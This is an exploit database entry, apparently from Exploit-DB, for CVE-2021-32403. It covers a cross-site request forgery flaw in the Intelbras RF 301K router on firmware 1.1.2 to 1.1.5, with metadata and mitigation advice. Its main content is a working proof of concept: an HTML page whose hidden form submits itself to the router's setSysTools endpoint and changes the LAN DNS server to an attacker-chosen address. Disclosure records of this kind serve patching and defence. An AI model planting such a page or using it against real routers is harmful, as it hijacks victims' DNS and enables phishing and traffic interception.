Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)

vendor:

Intelbras Router RF 301K

by:

Rodolfo Mariano

8.8

CVSS

HIGH

DNS Hijacking

200

CWE

Product Name: Intelbras Router RF 301K

Affected Version From: Firmware 1.1.2

Affected Version To: Firmware 1.1.5

Patch Exists: YES

Related CWE: CVE-2021-32403

CPE: h:intelbras:router_rf_301k

Metasploit:

Other Scripts:

Platforms Tested:

2021

Intelbras Router RF 301K – ‘DNS Hijacking’ Cross-Site Request Forgery (CSRF)

This exploit allows an attacker to perform a Cross-Site Request Forgery (CSRF) attack on the Intelbras Router RF 301K. By submitting a specially crafted form, the attacker can change the router's DNS settings, redirecting traffic to a malicious DNS server.

Mitigation:

To mitigate this vulnerability, it is recommended to update the router's firmware to version 1.1.6 or later. Additionally, users should regularly change the default credentials and disable remote management.

Source

Exploit-DB raw data:

# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)
# Date: 01/05/2021
# Exploit Author: Rodolfo Mariano
# Version: Firmware 1.1.2-1.1.5
# CVE: 2021-32403

# Exploit Code: 
<html>
    <form action="http://10.0.0.1/goform/setSysTools" method="POST">
        <input name="module3" value="lanCfg" type="hidden">
        <input name="lanIP" value="10.0.0.1" type="hidden">
        <input name="lanMask" value="255.255.255.0" type="hidden">
        <input name="dhcpEn" value="true" type="hidden">
        <input name="lanDhcpStartIP" value="10.0.0.100" type="hidden">
        <input name="lanDhcpEndIP" value="10.0.0.200" type="hidden">
        <input name="lanDns1" value="192.168.0.30" type="hidden">
        <input name="lanDns2" value="" type="hidden">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</html>